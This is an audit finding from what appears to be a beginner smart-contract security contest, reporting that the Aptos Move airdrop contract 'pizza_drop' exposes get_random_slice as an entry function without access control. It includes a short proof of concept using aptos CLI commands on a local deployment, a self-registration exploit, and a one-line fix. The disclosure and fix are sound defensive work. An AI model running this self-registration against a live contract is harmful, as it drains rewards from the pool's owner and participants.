Aptos Pizza Drop

Cyfrin

Beginner FriendlyGameFi

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

H-02 Complete Access Control Bypass

georgibuilds

Root + Impact

Description

The contract allows any user to register themselves directly without owner approval, completely bypassing the intended access control mechanism. The get_random_slice() function is exposed as an entry function without any permission checks, allowing anyone to call it and assign themselves reward amounts.

This breaks the fundamental security model where only the contract owner should control who gets registered for the airdrop. Users can self-register and claim rewards without any approval process.

// Line 121 in pizza_drop.move

#[randomness]

entry fun get_random_slice(user_addr: address) // NO ACCESS CONTROL

Risk

Likelihood:

Any user can call this function immediately upon contract deployment
No special knowledge or tools required - standard blockchain transaction
Function is publicly exposed in the contract interface
Works 100% of the time with any valid address

Impact:

Complete breakdown of owner-controlled registration system
Unlimited users can register themselves without permission
Owner loses all control over airdrop participant management
Anyone can drain the reward pool by self-registering and claiming
Fundamental protocol security assumptions are violated

Proof of Concept

Live blockchain demonstration with fresh contract deployment:

The test demonstrates complete bypass of the intended owner registration process. The user registered themselves and received a reward allocation without any owner interaction or permission.

// VULNERABILITY: Any user can bypass owner registration controls

// Step 1: Contract Setup (Normal deployment by owner)

aptos move publish --profile local --named-addresses pizza_drop=local

aptos move run --function-id 'local::airdrop::fund_pizza_drop' --args u64:1000000 --profile local

// Result: Contract deployed and funded with 1,000,000 Octas by owner

// Step 2: ATTACK - Unauthorized user bypasses registration system

// Testuser calls get_random_slice() directly without owner permission

aptos move run --function-id 'local::airdrop::get_random_slice' --args address:0xa37d1e037339b7b708236a6403e213cfbf23d980bd3003f079edb424f0b8e78b --profile testuser

// Expected: Transaction should FAIL with access control error

// Actual: Transaction SUCCEEDS - "success": true, "vm_status": "Executed successfully"

// Step 3: Verification of successful bypass

aptos move view --function-id 'local::airdrop::get_claimed_amount' --args address:0xa37d1e037339b7b708236a6403e213cfbf23d980bd3003f079edb424f0b8e78b --profile local

// Result: "459" - User successfully assigned 459 Octas without owner approval

// Additional verification

aptos move view --function-id 'local::airdrop::is_registered' --args address:0xa37d1e037339b7b708236a6403e213cfbf23d980bd3003f079edb424f0b8e78b --profile local

// Result: true - User is now registered in the system

// Step 4: User can now claim rewards without owner ever approving them

aptos move run --function-id 'local::airdrop::claim_pizza_slice' --profile testuser

// This would succeed, allowing unauthorized reward claiming

Impact Demonstration:

This proof demonstrates complete breakdown of the access control system. The vulnerability allows:

Unauthorized Registration: Any user can register themselves without owner approval
Reward Assignment: Users receive random amounts (100-500 Octas) automatically
Pool Drainage: Unlimited users can self-register and claim rewards
Owner Control Loss: The intended gatekeeping mechanism is completely bypassed

Root Cause: The get_random_slice() function is marked as entry fun without any access control checks, making it publicly callable by anyone instead of being an internal helper function.

Recommended Mitigation

Remove the entry modifier to make the function internal-only, callable only from register_pizza_lover() which has proper owner access control. This restores the intended security model where only the owner can register users

- #[randomness]

- entry fun get_random_slice(user_addr: address) acquires ModuleData, State {

+ fun get_random_slice(user_addr: address) acquires ModuleData, State {

Updates

Appeal created

bube Lead Judge 11 days ago

Submission Judgement Published

Validated

Assigned finding tags:

Anyone can call `get_random_slice` function

Rewards breakdown

nSLOC

125

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.